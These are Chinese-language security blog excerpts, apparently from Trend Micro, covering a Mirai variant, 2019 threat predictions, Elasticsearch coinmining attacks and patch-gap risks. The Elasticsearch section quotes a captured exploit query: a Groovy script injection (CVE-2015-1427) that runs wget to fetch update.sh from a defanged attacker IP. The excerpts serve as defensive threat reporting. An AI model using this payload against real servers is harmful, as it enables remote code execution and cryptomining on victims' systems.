趨勢科技發現了一隻使用了13種不同漏洞的新Mirai變種(偵測為Backdoor.Linux.MIRAI.VWIPT),這些漏洞幾乎都在之前的Mirai攻擊出現過。這是隻典型的Mirai變種,具有後門及分散式阻斷服務(DDoS)功能。但這是第一次使用所有13個漏洞的案例。
這起攻擊發生在我們上次報導Mirai攻擊活動後幾週,針對了各種路由器。上次報導中所提到的一些漏洞也被用於此變種。
趨勢科技一開始發現此新變種是來自於我們一個收集物聯網(IoT ,Internet of Thing)相關攻擊的蜜罐系統。可以看出此惡意軟體使用了各種不同的散播方式,還發現它會用三個XOR密鑰來加密資料。用XOR解密惡意軟體字串後發現了Mirai變種的指標。可以從圖1中看到解密字串。
繼續閱讀趨勢科技對 2019 年的資安預測是根據我們內部研究專家對當前與新興科技、使用者行為、市場潮流以及這些因素對威脅情勢的影響所做的分析。我們考量其主要影響範圍以及科技與政治變革的擴散特性,將這些預測分成幾大領域。我們將分期刊出。
為了因應資安廠商推出的新技術,尤其是機器學習在網路資安領域重新獲得青睞,網路犯罪集團將運用更高的技巧來「魚目混珠」。歹徒將不斷開發出所謂「就地取材」的技巧,也就是將一些日常運算裝置用於原本設計之外的用途,並且在網路上分享。我們已經看到幾個這樣的例子。
當網路犯罪集團採用上述技巧來感染系統時,單靠機器學習技術來防禦資安威脅的企業將面臨嚴重考驗。我們預料這些網路犯罪技巧在 2019 年將越來越盛行。
零時差漏洞攻擊 一直是資安界的注目焦點之一,因為:
網路犯罪集團發動攻擊的最佳時機,其實是廠商釋出修補更新到企業系統真正套用這些更新之間的空窗期。
2019 年,漏洞攻擊的成功方程式是:利用一些已經釋出修補更新、但企業卻尚未套用更新的漏洞。這些漏洞可能有數週、甚至數個月的時間可以讓歹徒利用。未來,這類利用修補空窗期的漏洞攻擊,將是網路資安的一大禍源。
不論是 Docker 這套容器化軟體或 Kubernetes 這套容器協調系統,目前在雲端部署環境的使用率皆相當普遍。近年來 Kubernetes 已被發現數個漏洞 ,其中一個 「重大」等級的漏洞 就在今年即將結束之前被發現。根據一位專門研究雲端基礎架構漏洞的專家「Kromtech」發現,有十幾個惡意的 Docker 映像 在上架的一年內至少被不知情的開發人員下載了五百萬次。
隨著越來越多企業移轉至雲端,針對雲端基礎架構漏洞的研究將開始獲得進展,尤其,開放原始碼社群對於雲端相關軟體的使用率及研究正在日益成長。
原文出處:Mapping the Future:Dealing With Pervasive and Persistent Threats
延伸閱讀:
【2019 年資安預測 】在家上班員工,將為企業帶來那些資安風險?
【2019 年資安預測】被偷的帳號都被拿來做什麼?累積里程、製造假評論、灌票…
本報告為英文版,若要索取中文版,請至趨勢科技粉絲頁,私訊小編:「我要索取2019資安報告中文版」
趨勢科技曾在蜜罐系統上發現了關於搜尋引擎 Elasticsearch (用Lucene程式庫開發的開放原始碼Java搜尋引擎)的惡意挖礦( coinmining )活動。這波攻擊利用了漏洞CVE-2015-1427(位在Groovy 腳本引擎,讓遠端攻擊者可以用特製腳本來執行任意 shell 命令)以及CVE-2014-320(Elasticsearch預設設定內的漏洞)。Elasticsearch已經不再支援有漏洞的版本。
我們在運行Elasticsearch的伺服器上發現帶有以下命令的查詢(ISC也在一篇文章中提到):
“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P
/tmp/sssooo\”).getText()”}}}”
這命令是由同個系統/攻擊主機執行,後續病毒也是放在此主機上。在本文編寫時,使用此IP的是網域matrixhazel[.]com(無法連上)。此系統安裝的是CentOS 6,同時運行了網頁伺服器和SSH伺服器。
圖1、GreyNotes將此這主機標記為已知掃描器
要注意的是,這種攻擊並不新鮮,只是最近又重新出現。趨勢科技的Smart Protection Network 11月在多個地區偵測到虛擬貨幣挖礦病毒,包括了台灣、中國和美國。
挖礦病毒散播bash腳本update.sh的方式是先調用shell來下載並輸出成檔案“/tmp/sssooo“(因為大多數系統對/tmp的限制較少)。
這種攻擊簡單卻會對受害者產生重大的影響。一旦攻擊者可以在系統上執行任意命令,就可以提升權限,甚至將目標轉向其他系統來進一步地入侵網路。
還應該注意的是,雖然大多數案例的攻擊手法相同,但所使用的惡意檔案可能不同。在我們所分析的案例中,使用的是update.sh。一但執行腳本update.sh就會下載檔案devtools和config.json。接著就會部署虛擬貨幣挖礦病毒(趨勢科技偵測為 Coinminer.Linux.MALXMR.UWEIS)。 繼續閱讀
漏洞可能會對企業造成難以預料的影響。一但被攻擊也會危害到個人身份資料(PII)隱私,帶來嚴重的後果。它們不僅會損害公司信譽 – 還損害了儲存管理這些敏感資料基礎設施的完整性。
Equifax資料外洩事件就是個很好的例子。攻擊者藉由入侵其應用程式框架內的漏洞(CVE-2017-5638)來取得其網路和系統的控制能力。這次攻擊讓1.455億份美國公民及1520萬份英國客戶的PII被外洩,造成的財務損失估計達到4.39億美元。
是的,只需要一個有漏洞的端點、網路、伺服器或應用程式,就可能會造成百萬倍的影響。Shellshock、Heartbleed、Poodle和EternalBlue都是惡名昭彰的安全漏洞之一,為資料竊取病毒及其他攻擊打開大門。但還有其他更多更多 – 事實上,在2017年有1,522個被公開報告的漏洞。這些漏洞有929個透過趨勢科技的零時差計畫(ZDI)披露,嚴重程度被評為「嚴重」或「高」。
[年中資安綜合報告:2018年上半年所披露的202個資料採集與監控系統(SCADA)漏洞]
更新修補程式可以協助企業有效地降低這些威脅。但對許多組織來說,這仍然是個常見的問題。事實上,被訪談的組織平均需要197天來識別資料外洩。而監視物聯網(IoT)設備和工業物聯網(IIoT)系統的新增任務更加劇了防止資料外洩的難度。IT和安全團隊也可能會發現要在所有漏洞遭受攻擊前完成下載、測試和部署修補程式,同時還要保持系統、網路和伺服器正常運行幾乎是件不可能的任務。
零時差攻擊對企業造成的影響越來越大。但緊急/非常態更新以及虛擬化等緊急措施可能會造成運作停擺和額外的成本。此外還有法規遵循的問題,如歐盟一般資料保護法規(GDPR)所可能帶來的巨額罰款或支付卡產業(PCI)嚴格的修補要求。
